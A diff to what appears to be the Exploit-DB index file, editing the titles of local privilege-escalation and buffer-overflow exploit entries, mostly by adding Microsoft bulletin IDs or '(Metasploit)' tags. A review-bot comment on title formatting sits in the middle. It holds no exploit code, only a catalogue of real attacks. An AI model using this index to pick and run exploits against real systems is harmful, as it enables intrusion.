+17451,platforms/windows/local/17451.rb,"Microsoft Visio - 'VISIODWG.dll' .DXF File Handling (MS10-028) (Metasploit)",2011-06-26,Metasploit,windows,local,0
 17459,platforms/windows/local/17459.txt,"Valve Steam Client Application 1559/1559 - Privilege Escalation",2011-06-29,LiquidWorm,windows,local,0
 17473,platforms/windows/local/17473.txt,"Adobe Reader X 10.0.0 < 10.0.1 - Atom Type Confusion Exploit",2011-07-03,Snake,windows,local,0
 17474,platforms/windows/local/17474.txt,"Microsoft Office 2010 - '.RTF' Header Stack Overflow",2011-07-03,Snake,windows,local,0
@@ -6748,7 +6754,7 @@ id,file,description,date,author,platform,type,port
 17499,platforms/windows/local/17499.rb,"CoolPlayer Portable 2.19.2 - Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",windows,local,0
 17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 - '.mppl' Stack Buffer Overflow (Metasploit)",2011-07-07,Metasploit,windows,local,0
 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - '.zip' Buffer Overflow",2011-07-08,"C4SS!0 G0M3S",windows,local,0
-40085,platforms/windows/local/40085.rb,"Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDav Privilege Escalation (MS16-016)",2016-07-11,Metasploit,windows,local,0
+40085,platforms/windows/local/40085.rb,"Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDav Privilege Escalation (MS16-016) (Metasploit)",2016-07-11,Metasploit,windows,local,0
 17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 'KisKrnl.sys' 2011.7.8.913 - Local Kernel Mode Privilege Escalation",2011-07-22,MJ0011,windows,local,0
 17563,platforms/windows/local/17563.py,"Download Accelerator plus (DAP) 9.7 - M3U File Buffer Overflow (Unicode SEH)",2011-07-23,"C4SS!0 G0M3S",windows,local,0
 17565,platforms/windows/local/17565.pl,"MPlayer Lite r33064 - m3u Buffer Overflow (DEP Bypass)",2011-07-24,"C4SS!0 and h1ch4m",windows,local,0
@@ -6796,20 +6802,20 @@ id,file,description,date,author,platform,type,port
 18027,platforms/windows/local/18027.rb,"Cytel Studio 9.0 - '.CY3' Stack Buffer Overflow (Metasploit)",2011-10-24,Metasploit,windows,local,0
 18038,platforms/windows/local/18038.rb,"GTA SA-MP server.cfg - Buffer Overflow (Metasploit)",2011-10-26,Metasploit,windows,local,0
 18064,platforms/linux/local/18064.sh,"Calibre E-Book Reader - Privilege Escalation (1)",2011-11-02,zx2c4,linux,local,0
-18067,platforms/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite",2011-11-02,Abysssec,windows,local,0
+18067,platforms/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite (MS11-021)",2011-11-02,Abysssec,windows,local,0
 18071,platforms/linux/local/18071.sh,"Calibre E-Book Reader - Privilege Escalation (2)",2011-11-03,zx2c4,linux,local,0
 18072,platforms/linux/local/18072.sh,"Calibre E-Book Reader - Race Condition Privilege Escalation",2011-11-03,zx2c4,linux,local,0
 18080,platforms/linux/local/18080.c,"Linux Kernel 2.6.37-rc1 - 'serial_multiport_struct' Local Information Leak Exploit",2011-11-04,"Todor Donev",linux,local,0
-18082,platforms/windows/local/18082.rb,"Mini-stream Ripper 3.0.1.1 - Buffer Overflow (3)",2011-11-04,Metasploit,windows,local,0
+18082,platforms/windows/local/18082.rb,"Mini-stream Ripper 3.0.1.1 - Buffer Overflow (Metasploit) (3)",2011-11-04,Metasploit,windows,local,0
 18086,platforms/linux/local/18086.c,"Calibre E-Book Reader - Privilege Escalation (3)",2011-11-05,zx2c4,linux,local,0
-18087,platforms/windows/local/18087.rb,"Microsoft Excel 2007 - '.xlb' Buffer Overflow (MS11-021)",2011-11-05,Metasploit,windows,local,0
+18087,platforms/windows/local/18087.rb,"Microsoft Excel 2007 - '.xlb' Buffer Overflow (MS11-021) (Metasploit)",2011-11-05,Metasploit,windows,local,0
 18096,platforms/windows/local/18096.py,"Aviosoft Digital TV Player Professional 1.x - Stack Buffer Overflow",2011-11-09,modpr0be,windows,local,0
 18105,platforms/linux/local/18105.sh,"glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation",2011-11-10,zx2c4,linux,local,0
 18109,platforms/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 - Stack Buffer Overflow (Metasploit)",2011-11-13,Metasploit,windows,local,0
 18113,platforms/windows/local/18113.rb,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Stack Buffer Overflow (Metasploit)",2011-11-14,Metasploit,windows,local,0
 18137,platforms/win_x86/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows (ASLR + DEP Bypass) (Metasploit)",2011-11-21,hellok,win_x86,local,0
 18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - '.wav' Stack Buffer Overflow (Metasploit)",2011-11-22,Metasploit,windows,local,0
-18143,platforms/windows/local/18143.rb,"Microsoft Excel - Malformed OBJ Record Handling Overflow (MS11-038)",2011-11-22,Metasploit,windows,local,0
+18143,platforms/windows/local/18143.rb,"Microsoft Excel - Malformed OBJ Record Handling Overflow (MS11-038) (Metasploit)",2011-11-22,Metasploit,windows,local,0
 18147,platforms/linux/local/18147.c,"bzexe (bzip2) - Race Condition",2011-11-23,vladz,linux,local,0
 18174,platforms/windows/local/18174.py,"GOM Player 2.1.33.5071 - '.asx' File Unicode Stack Buffer Overflow",2011-11-30,"Debasish Mandal",windows,local,0
 18176,platforms/windows/local/18176.py,"Microsoft Windows XP/2003 - 'afd.sys' Privilege Escalation (MS11-080)",2011-11-30,ryujin,windows,local,0
@@ -6820,7 +6826,7 @@ id,file,description,date,author,platform,type,port
 18201,platforms/windows/local/18201.txt,"SopCast 3.4.7 - (Diagnose.exe) Improper Permissions",2011-12-05,LiquidWorm,windows,local,0
 18228,platforms/linux/local/18228.sh,"Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Boundary Crossing Privilege Escalation",2011-12-10,otr,linux,local,0
 18258,platforms/windows/local/18258.c,"TORCS 1.3.1 - acc Buffer Overflow",2011-12-20,"Andrés Gómez",windows,local,0
-18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro - Code Execution",2012-01-08,"b33f & g11tch",windows,local,0
+18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro - Code Execution (MS10-087)",2012-01-08,"b33f & g11tch",windows,local,0
 18349,platforms/windows/local/18349.pl,"Blade API Monitor 3.6.9.2 - Unicode Stack Buffer Overflow",2012-01-10,FullMetalFouad,windows,local,0
 18372,platforms/windows/local/18372.txt,"Microsoft Windows - Assembly Execution (MS12-005)",2012-01-14,"Byoungyoung Lee",windows,local,0
 18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow (Unicode SEH) (Metasploit)",2012-01-17,Metasploit,windows,local,0
@@ -6865,7 +6871,7 @@ id,file,description,date,author,platform,type,port
 18954,platforms/windows/local/18954.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (Metasploit)",2012-05-30,Metasploit,windows,local,0
 18959,platforms/multiple/local/18959.txt,"Browsers Browsers - Navigation Download Trick",2012-05-31,"Michal Zalewski",multiple,local,0
 19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - '.PAC' Exploit",2012-06-07,b33f,windows,local,0
-19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005)",2012-06-11,Metasploit,windows,local,0
+19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005) (Metasploit)",2012-06-11,Metasploit,windows,local,0
 19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - NETLS_LICENSE_FILE Exploit",1996-04-05,"Arthur Hagen",irix,local,0
 19067,platforms/irix/local/19067.txt,"SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - LICENSEMGR_FILE_ROOT Exploit",1996-11-22,"Yuri Volobuev",irix,local,0
 19068,platforms/unix/local/19068.txt,"Digital UNIX 4.0/4.0 B/4.0 D - SUID/SGID Core File",1998-04-06,"ru5ty and SoReN",unix,local,0
@@ -7171,7 +7177,7 @@ id,file,description,date,author,platform,type,port
 19912,platforms/multiple/local/19912.txt,"Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 - /tmp Symlink",2000-05-10,foo,multiple,local,0
 19915,platforms/linux/local/19915.txt,"KDE 1.1/1.1.1/1.2/2.0 kscd - SHELL Environmental Variable",2000-05-16,Sebastian,linux,local,0
 19925,platforms/linux/local/19925.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility krb_rd_req() Buffer Overflow (2)",2000-05-26,"Jim Paris",linux,local,0
-19930,platforms/windows/local/19930.rb,"Microsoft Windows - Task Scheduler XML Privilege Escalation (Metasploit)",2012-07-19,Metasploit,windows,local,0
+19930,platforms/windows/local/19930.rb,"Microsoft Windows - Task Scheduler .XML Privilege Escalation (MS10-092) (Metasploit)",2012-07-19,Metasploit,windows,local,0
 19933,platforms/linux/local/19933.rb,"Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - 'Sendpage' Privilege Escalation (Metasploit)",2012-07-19,Metasploit,linux,local,0
 19946,platforms/linux/local/19946.txt,"OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 - '/usr/tmp/' Symlink",2000-04-21,anonymous,linux,local,0
 19952,platforms/linux/local/19952.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",linux,local,0
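Review bot: The renamed title for 19930 writes the file type as a bare `.XML`, whereas the 16686 rename in this same commit quotes it as `'.RTF'`, the form most other titles in the file use for extensions. If the quoted form is the convention, the field would read `"Microsoft Windows - Task Scheduler '.XML' Privilege Escalation (MS10-092) (Metasploit)"`. Whether "XML" here is meant as a file extension at all is not clear from the diff, so the original unprefixed `XML` may be the more accurate wording.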
@@ -7259,7 +7265,7 @@ id,file,description,date,author,platform,type,port
 20543,platforms/windows/local/20543.rb,"Microsoft Windows - Service Trusted Path Privilege Escalation (Metasploit)",2012-08-15,Metasploit,windows,local,0
 20262,platforms/windows/local/20262.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (2)",2012-08-05,pole,windows,local,0
 20263,platforms/irix/local/20263.txt,"IRIX 5.2/6.0 - Permissions File Manipulation",1995-03-02,"Larry Glaze",irix,local,0
-20265,platforms/windows/local/20265.txt,"Microsoft Windows NT 4.0 / 2000 - Spoofed LPC Request",2000-10-03,"BindView's Razor Team",windows,local,0
+20265,platforms/windows/local/20265.txt,"Microsoft Windows NT 4.0 / 2000 - Spoofed LPC Request (MS00-003)",2000-10-03,"BindView's Razor Team",windows,local,0
 20274,platforms/multiple/local/20274.pl,"IBM Websphere 2.0/3.0 - ikeyman Weak Encrypted Password",1999-10-24,"Ben Laurie",multiple,local,0
 20275,platforms/solaris/local/20275.sh,"Netscape iCal 2.1 Patch2 iPlanet iCal - 'iplncal.sh' Permissions",2000-10-10,@stake,solaris,local,0
 20276,platforms/solaris/local/20276.sh,"Netscape iCal 2.1 Patch2 - iPlanet iCal 'csstart'",2000-10-10,@stake,solaris,local,0
@@ -7362,7 +7368,7 @@ id,file,description,date,author,platform,type,port
 20823,platforms/linux/local/20823.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (2)",2001-07-05,cairnsc,linux,local,0
 20843,platforms/linux/local/20843.txt,"Immunix OS 6.2/7.0 / RedHat 5.2/6.2/7.0 / S.u.S.E 6.x/7.0/7.1 Man -S - Heap Overflow",2001-05-13,"zenith parsec",linux,local,0
 20851,platforms/sco/local/20851.txt,"SCO OpenServer 5.0.x - StartX Weak XHost Permissions",2001-05-07,"Richard Johnson",sco,local,0
-20861,platforms/win_x86-64/local/20861.txt,"Microsoft Windows Kernel - Intel x64 SYSRET (PoC)",2012-08-27,"Shahriyar Jalayeri",win_x86-64,local,0
+20861,platforms/win_x86-64/local/20861.txt,"Microsoft Windows Kernel - Intel x64 SYSRET (MS12-042) (PoC)",2012-08-27,"Shahriyar Jalayeri",win_x86-64,local,0
 20867,platforms/linux/local/20867.txt,"ARCservIT 6.61/6.63 Client - asagent.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0
 20868,platforms/linux/local/20868.txt,"ARCservIT 6.61/6.63 Client - inetd.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0
 20880,platforms/windows/local/20880.c,"Microsoft Windows 2000 - Debug Registers",2001-05-24,"Georgi Guninski",windows,local,0
@@ -7568,7 +7574,7 @@ id,file,description,date,author,platform,type,port
 21881,platforms/bsd/local/21881.txt,"Rogue 5.3 - Local Buffer Overflow",2002-09-30,stanojr@iserver.sk,bsd,local,0
 21831,platforms/windows/local/21831.c,"PLIB 1.8.5 - ssg/ssgParser.cxx Buffer Overflow",2012-10-09,"Andrés Gómez",windows,local,0
 21843,platforms/windows/local/21843.rb,"Microsoft Windows - Escalate UAC Execute RunAs (Metasploit)",2012-10-10,Metasploit,windows,local,0
-21844,platforms/windows/local/21844.rb,"Microsoft Windows - 'AfdJoinLeaf' Privilege Escalation (MS11-080)",2012-10-10,Metasploit,windows,local,0
+21844,platforms/windows/local/21844.rb,"Microsoft Windows - 'AfdJoinLeaf' Privilege Escalation (MS11-080) (Metasploit)",2012-10-10,Metasploit,windows,local,0
 21845,platforms/windows/local/21845.rb,"Microsoft Windows - Escalate UAC Protection Bypass (Metasploit)",2012-10-10,Metasploit,windows,local,0
 21848,platforms/linux/local/21848.rb,"Linux udev - Netlink Privilege Escalation (Metasploit)",2012-10-10,Metasploit,linux,local,0
 21856,platforms/multiple/local/21856.txt,"OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification",2002-09-25,"Mike Riley",multiple,local,0
@@ -7675,7 +7681,7 @@ id,file,description,date,author,platform,type,port
 22811,platforms/bsd/local/22811.c,"Abuse-SDL 0.7 - Command-Line Argument Buffer Overflow",2003-06-19,Matrix_DK,bsd,local,0
 22813,platforms/linux/local/22813.c,"Linux Kernel 2.2.x / 2.4.x - /proc Filesystem Potential Information Disclosure",2003-06-20,IhaQueR,linux,local,0
 22815,platforms/linux/local/22815.c,"GNU GNATS 3.113 - Environment Variable Buffer Overflow",2003-06-21,Xpl017Elz,linux,local,0
-40409,platforms/windows/local/40409.txt,"Kerberos in Microsoft Windows - Security Feature Bypass (MS16-101)",2016-09-22,"Nabeel Ahmed",windows,local,0
+40409,platforms/windows/local/40409.txt,"Microsoft Windows Kerberos - Security Feature Bypass (MS16-101)",2016-09-22,"Nabeel Ahmed",windows,local,0
 22835,platforms/windows/local/22835.c,"Tripbit Secure Code Analizer 1.0 - Local fgets() Buffer Overrun",2003-06-24,posidron,windows,local,0
 22836,platforms/linux/local/22836.pl,"Elm 2.3/2.4 - Local TERM Environment Variable Buffer Overrun",1997-05-13,kokanin,linux,local,0
 22840,platforms/linux/local/22840.c,"Linux Kernel 2.4 - SUID execve() System Call Race Condition Executable File Read (PoC)",2003-06-26,IhaQueR,linux,local,0
@@ -7785,7 +7791,7 @@ id,file,description,date,author,platform,type,port
 23910,platforms/windows/local/23910.txt,"F-Secure BackWeb 6.31 - Privilege Escalation",2004-04-06,"Ian Vitek",windows,local,0
 23921,platforms/windows/local/23921.c,"Centrinity FirstClass Desktop Client 7.1 - Local Buffer Overflow",2004-04-07,I2S-LaB,windows,local,0
 40400,platforms/windows/local/40400.txt,"SolarWinds Kiwi CatTools 3.11.0 - Unquoted Service Path Privilege Escalation",2016-09-19,"Halil Dalabasmaz",windows,local,0
-23989,platforms/windows/local/23989.c,"Microsoft Windows 2000/NT 4 - Local Descriptor Table Privilege Escalation",2004-04-18,mslug@safechina.net,windows,local,0
+23989,platforms/windows/local/23989.c,"Microsoft Windows 2000/NT 4 - Local Descriptor Table Privilege Escalation (MS04-011)",2004-04-18,mslug@safechina.net,windows,local,0
 23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - '.jpeg' Exploit",2013-01-09,"Debasish Mandal",windows,local,0
 24014,platforms/windows/local/24014.bat,"Symantec Norton AntiVirus 2002 - Nested File Manual Scan Bypass",2004-04-17,"Bipin Gautam",windows,local,0
 24015,platforms/bsd/local/24015.c,"BSD-Games 2.x - Mille Local Save Game File Name Buffer Overrun",2004-04-17,N4rK07IX,bsd,local,0
@@ -7804,7 +7810,7 @@ id,file,description,date,author,platform,type,port
 24207,platforms/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Exploit",2013-01-18,"Jon Bailey",windows,local,0
 24210,platforms/hp-ux/local/24210.pl,"HP-UX 7-11 - Local X Font Server Buffer Overflow",2003-03-10,watercloud,hp-ux,local,0
 24258,platforms/windows/local/24258.txt,"Aloaha Credential Provider Monitor 5.0.226 - Privilege Escalation",2013-01-20,LiquidWorm,windows,local,0
-24277,platforms/windows/local/24277.c,"Microsoft Windows 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation",2004-07-16,bkbll,windows,local,0
+24277,platforms/windows/local/24277.c,"Microsoft Windows 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)",2004-07-16,bkbll,windows,local,0
 24278,platforms/linux/local/24278.sh,"IM-Switch - Insecure Temporary File Handling Symbolic Link",2004-07-13,"SEKINE Tatsuo",linux,local,0
 24293,platforms/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon Valle",sco,local,0
 24335,platforms/unix/local/24335.txt,"Oracle9i Database - Default Library Directory Privilege Escalation",2004-07-30,"Juan Manuel Pascual Escribá",unix,local,0
@@ -7943,7 +7949,7 @@ id,file,description,date,author,platform,type,port
 27231,platforms/linux/local/27231.txt,"GnuPG 1.x - Detached Signature Verification Bypass",2006-02-15,taviso,linux,local,0
 27282,platforms/windows/local/27282.txt,"Agnitum Outpost Security Suite 8.1 - Privilege Escalation",2013-08-02,"Ahmad Moghimi",windows,local,0
 27285,platforms/hardware/local/27285.txt,"Karotz Smart Rabbit 12.07.19.00 - Multiple Vulnerabilities",2013-08-02,"Trustwave's SpiderLabs",hardware,local,0
-27296,platforms/windows/local/27296.rb,"Microsoft Windows - HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005)",2013-08-02,Metasploit,windows,local,0
+27296,platforms/windows/local/27296.rb,"Microsoft Windows - HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005) (Metasploit)",2013-08-02,Metasploit,windows,local,0
 27297,platforms/linux/local/27297.c,"Linux Kernel 3.7.6 (RedHat x86/x64) - 'MSR' Driver Privilege Escalation",2013-08-02,spender,linux,local,0
 27316,platforms/windows/local/27316.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow (SEH)",2013-08-03,sagi-,windows,local,0
 27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function - additional_parameters Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0
@@ -7955,7 +7961,7 @@ id,file,description,date,author,platform,type,port
 27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0
 27769,platforms/linux/local/27769.txt,"Linux Kernel 2.6.x - CIFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0
 27874,platforms/windows/local/27874.py,"Winamp 5.63 - 'winamp.ini' Local Exploit",2013-08-26,"Ayman Sagy",windows,local,0
-27938,platforms/linux/local/27938.rb,"VMware - Setuid VMware-mount Unsafe popen(3)",2013-08-29,Metasploit,linux,local,0
+27938,platforms/linux/local/27938.rb,"VMware - Setuid VMware-mount Unsafe popen(3) (Metasploit)",2013-08-29,Metasploit,linux,local,0
 27944,platforms/osx/local/27944.rb,"Apple Mac OSX - Sudo Password Bypass (Metasploit)",2013-08-29,Metasploit,osx,local,0
 27965,platforms/osx/local/27965.py,"Apple Mac OSX 10.8.4 - Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",osx,local,0
 28084,platforms/windows/local/28084.html,"KingView 6.53 - Insecure ActiveX Control (SuperGrid)",2013-09-04,blake,windows,local,0
@@ -8077,7 +8083,7 @@ id,file,description,date,author,platform,type,port
 31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Privilege Escalation",2014-02-06,LiquidWorm,windows,local,0
 31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - '.pui' Buffer Overflow (SEH)",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0
 31574,platforms/arm/local/31574.c,"Linux Kernel < 3.4.5 (ARM Android 4.2.2 / 4.4) - Privilege Escalation",2014-02-11,"Piotr Szerman",arm,local,0
-31576,platforms/windows/local/31576.rb,"Microsoft Windows - TrackPopupMenuEx Win32k NULL Page (Metasploit)",2014-02-11,Metasploit,windows,local,0
+31576,platforms/windows/local/31576.rb,"Microsoft Windows - TrackPopupMenuEx Win32k NULL Page (MS13-081) (Metasploit)",2014-02-11,Metasploit,windows,local,0
 31643,platforms/windows/local/31643.rb,"Easy CD-DA Recorder - '.pls' Buffer Overflow (Metasploit)",2014-02-13,Metasploit,windows,local,0
 31667,platforms/windows/local/31667.txt,"Microsoft Windows - SeImpersonatePrivilege - Privilege Escalation",2008-04-17,"Cesar Cerrudo",windows,local,0
 31688,platforms/windows/local/31688.pl,"ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)",2014-02-16,"Mike Czumak",windows,local,0
@@ -8119,7 +8125,7 @@ id,file,description,date,author,platform,type,port
 32752,platforms/windows/local/32752.rb,"WinRAR - Filename Spoofing (Metasploit)",2014-04-08,Metasploit,windows,local,0
 32771,platforms/windows/local/32771.txt,"Multiple Kaspersky Products 'klim5.sys' - Privilege Escalation",2009-02-02,"Ruben Santamarta",windows,local,0
 32778,platforms/windows/local/32778.pl,"Password Door 8.4 - Local Buffer Overflow",2009-02-05,b3hz4d,windows,local,0
-32793,platforms/windows/local/32793.rb,"Microsoft Word - RTF Object Confusion (MS14-017)",2014-04-10,Metasploit,windows,local,0
+32793,platforms/windows/local/32793.rb,"Microsoft Word - RTF Object Confusion (MS14-017) (Metasploit)",2014-04-10,Metasploit,windows,local,0
 32805,platforms/linux/local/32805.c,"Linux Kernel 2.6.x - 'sock.c' SO_BSDCOMPAT Option Information Disclosure",2009-02-20,"Clément Lecigne",linux,local,0
 32820,platforms/linux/local/32820.txt,"OpenSC 0.11.x - PKCS#11 Implementation Unauthorized Access",2009-02-26,"Andreas Jellinghaus",linux,local,0
 32813,platforms/osx/local/32813.c,"Apple Mac OSX (Lion) Kernel xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation",2014-04-11,"Kenzley Alphonse",osx,local,0
@@ -8140,7 +8146,7 @@ id,file,description,date,author,platform,type,port
 33069,platforms/windows/local/33069.rb,"Wireshark 1.8.12/1.10.5 - wiretap/mpeg.c Stack Buffer Overflow (Metasploit)",2014-04-28,Metasploit,windows,local,0
 33145,platforms/linux/local/33145.c,"PHP Fuzzer Framework - Default Location Insecure Temporary File Creation",2009-08-03,"Melissa Elliott",linux,local,0
 33161,platforms/php/local/33161.php,"PHP 5.3 - 'mail.log' Configuration Option 'open_basedir' Restriction Bypass",2009-08-10,"Maksymilian Arciemowicz",php,local,0
-33213,platforms/windows/local/33213.rb,"Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)",2014-05-06,Metasploit,windows,local,0
+33213,platforms/windows/local/33213.rb,"Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)",2014-05-06,Metasploit,windows,local,0
 33229,platforms/bsd/local/33229.c,"NetBSD 5.0.1 - 'IRET' General Protection Fault Handling Privilege Escalation",2009-09-16,"Tavis Ormandy",bsd,local,0
 33255,platforms/linux/local/33255.txt,"Xen 3.x - pygrub Local Authentication Bypass",2009-09-25,"Jan Lieskovsky",linux,local,0
 33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.0 <= 2.6.31 - 'pipe.c' Privilege Escalation (1)",2009-11-03,"teach & xipe",linux,local,0
@@ -8165,8 +8171,8 @@ id,file,description,date,author,platform,type,port
 33799,platforms/solaris/local/33799.sh,"Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities",2010-03-24,"Larry W. Cashdollar",solaris,local,0
 33808,platforms/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
 33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - Privilege Escalation PoC (gid)",2014-06-21,"Vitaly Nikolenko",linux,local,0
-33892,platforms/windows/local/33892.rb,".NET Deployment Service - IE Sandbox Escape (MS14-009)",2014-06-27,Metasploit,windows,local,0
-33893,platforms/windows/local/33893.rb,"Registry Symlink - IE Sandbox Escape (MS13-097)",2014-06-27,Metasploit,windows,local,0
+33892,platforms/windows/local/33892.rb,"Microsoft .NET Deployment Service - IE Sandbox Escape (MS14-009) (Metasploit)",2014-06-27,Metasploit,windows,local,0
+33893,platforms/windows/local/33893.rb,"Microsoft Registry Symlink - IE Sandbox Escape (MS13-097) (Metasploit)",2014-06-27,Metasploit,windows,local,0
 33899,platforms/linux/local/33899.txt,"Chkrootkit 0.49 - Privilege Escalation",2014-06-28,"Thomas Stangner",linux,local,0
 33904,platforms/linux/local/33904.txt,"Nagios Plugins check_dhcp 2.0.2 - Arbitrary Option File Read Race Condition",2014-06-28,"Dawid Golunski",linux,local,0
 33961,platforms/windows/local/33961.txt,"Ubisoft Uplay 4.6 - Insecure File Permissions Privilege Escalation",2014-07-03,LiquidWorm,windows,local,0
@@ -8200,20 +8206,20 @@ id,file,description,date,author,platform,type,port
 34987,platforms/linux/local/34987.c,"Linux Kernel 2.6.x - 'net/core/filter.c' Local Information Disclosure",2010-11-09,"Dan Rosenberg",linux,local,0
 35010,platforms/ios/local/35010.c,"Apple iOS 4.0.2 - Networking Packet Filter Rules Privilege Escalation",2010-11-22,Apple,ios,local,0
 35019,platforms/windows/local/35019.py,"Microsoft Windows - OLE Package Manager SandWorm Exploit",2014-10-20,"Vlad Ovtchinikov",windows,local,0
-35020,platforms/win_x86/local/35020.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-060)",2014-10-20,Metasploit,win_x86,local,0
+35020,platforms/win_x86/local/35020.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)",2014-10-20,Metasploit,win_x86,local,0
 35021,platforms/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation (Metasploit)",2014-10-20,Metasploit,linux,local,0
 35040,platforms/windows/local/35040.txt,"iBackup 10.0.0.32 - Privilege Escalation",2014-10-22,"Glafkos Charalambous",windows,local,0
 35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 - '.wav' Buffer Overflow",2014-10-27,metacom,windows,local,0
 35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0
-35101,platforms/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (Metasploit)",2014-10-28,Metasploit,windows,local,0
+35101,platforms/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)",2014-10-28,Metasploit,windows,local,0
 35112,platforms/linux/local/35112.sh,"IBM Tivoli Monitoring 6.2.2 kbbacf1 - Privilege Escalation",2014-10-29,"Robert Jaroszuk",linux,local,0
 35161,platforms/linux/local/35161.c,"Linux Kernel 2.6.39 <= 3.2.2 (x86/x64) - 'Mempodipper.c' Privilege Escalation (2)",2012-01-12,zx2c4,linux,local,0
 35177,platforms/windows/local/35177.py,"i-FTP 2.20 - Buffer Overflow SEH Exploit",2014-11-06,metacom,windows,local,0
 35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 - 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0
 35216,platforms/windows/local/35216.py,"Microsoft Office 2007 / 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0
 35234,platforms/linux/local/35234.py,"OSSEC 2.8 - hosts.deny Privilege Escalation",2014-11-14,skynet-13,linux,local,0
-35235,platforms/windows/local/35235.rb,"Microsoft Windows - OLE Package Manager Code Execution Through Python (MS14-064)",2014-11-14,Metasploit,windows,local,0
-35236,platforms/windows/local/35236.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-064)",2014-11-14,Metasploit,windows,local,0
+35235,platforms/windows/local/35235.rb,"Microsoft Windows - OLE Package Manager Code Execution (via Python) (MS14-064) (Metasploit)",2014-11-14,Metasploit,windows,local,0
+35236,platforms/windows/local/35236.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)",2014-11-14,Metasploit,windows,local,0
 35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0
 35370,platforms/linux/local/35370.c,"Linux Kernel 3.14.5 (RHEL / CentOS 7) - 'libfutex' Privilege Escalation",2014-11-25,"Kaiqu Chen",linux,local,0
